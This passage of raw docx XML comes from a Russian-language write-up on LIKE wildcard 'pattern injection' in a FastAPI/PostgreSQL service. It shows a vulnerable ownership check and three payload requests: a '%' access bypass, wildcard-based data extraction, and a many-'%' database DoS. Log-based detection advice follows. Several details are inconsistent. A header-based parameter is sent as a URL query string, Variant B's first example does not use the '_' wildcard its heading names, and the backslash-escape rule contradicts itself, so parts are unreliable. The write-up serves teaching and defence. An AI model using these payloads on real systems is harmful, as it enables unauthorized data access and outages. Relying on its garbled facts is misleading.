        <w:t xml:space="preserve"> добавляет окружающие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-wildcards (стандартный «contains»-поиск). Bind-параметр передаёт строку как values, но движок LIKE интерпретирует символы внутри. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">корректная защита от SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">полная уязвимость к pattern injection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Второй пример — auth-check через LIKE (антипаттерн):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/documents/{doc_id}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_document(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    doc_id: int,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    current_user: str = Depends(get_current_user),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ownership check через LIKE</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title, body, owner_id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM documents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE id = :doc_id AND owner_id::text LIKE :user_filter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user_filter приходит из header или JWT-claim — не из login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    user_filter = request.headers.get("X-User-Filter", current_user)</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{"doc_id": doc_id, "user_filter": user_filter})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.first()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">X-User-Filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> приходит от клиента (например, через прокси, который не очищает заголовок) — атакующий ставит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читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">любой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> документ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — три варианта</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант A — auth/access bypass через `%`:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /documents/42?X-User-Filter=%25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">user_filter = "%"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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title, body, owner_id FROM documents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id = 42 AND owner_id::text LIKE '%'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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матчит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">любое</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> значение (включая NULL? нет — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает NULL для NULL, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отбрасывается; но любую non-NULL строку матчит). Document 42 возвращается независимо от его owner — full ownership bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант B — Information leak через position-by-position wildcards `_`:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /documents/search?q=a%25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern = "%a%%"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → матчит всё с буквой 'a'. Атакующий итерирует: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q=a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (count rows), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q=ab</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q=abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extraction скрытых данных через row count в response. Более точная техника:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /documents/search?q=admin@__@example.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern = "%admin@__@example.com%"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — матчит «admin@XX@example.com» с любыми двумя символами вместо XX. Position-by-position extraction email-формата.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант C — ReDoS-style DoS через множественные `%` (без index-support):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /documents/search?q=%25a%25b%25c%25d%25e%25f%25g%25h%25i%25j</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern = "%%a%b%c%d%e%f%g%h%i%j%"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (после URL-decode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%25</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На таблице documents без trigram-индекса PostgreSQL делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sequential scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + LIKE match для каждой row. Match-engine для pattern с множественными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уходит в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">exponential backtracking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на строках, содержащих partial matches (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">abcdefghijkl...</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Эксперимент на ~100k rows с длинными title (&gt;200 chars): time увеличивается от ~50ms (normal) до 30+ seconds для такого pattern. Множественные одновременные запросы — full DoS database connection pool.</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Variant A — bypass ownership/access check, полное чтение чужих данных. Variant B — information leak о формате значений через position-matching. Variant C — DoS database через backtracking matcher.</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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">... LIKE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LIKE '%...%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с длительностью &gt;&gt; normal — типичный pattern injection.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log_min_duration_statement = 1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: medium-DoS Variant C виден через slow queries.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HTTP access-log: query parameter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содержит множественные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (URL-encoded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подряд идущие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (URL-encoded </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LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PostgreSQL — стандартный SQL92-оператор pattern matching. По дизайну:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1.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matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">zero or more characters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </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 matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">exactly one character</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Любой другой символ — matches literally</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.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(backslash) — escape character </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">по умолчанию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только если LIKE с `ESCAPE` clause</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pattern Matching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
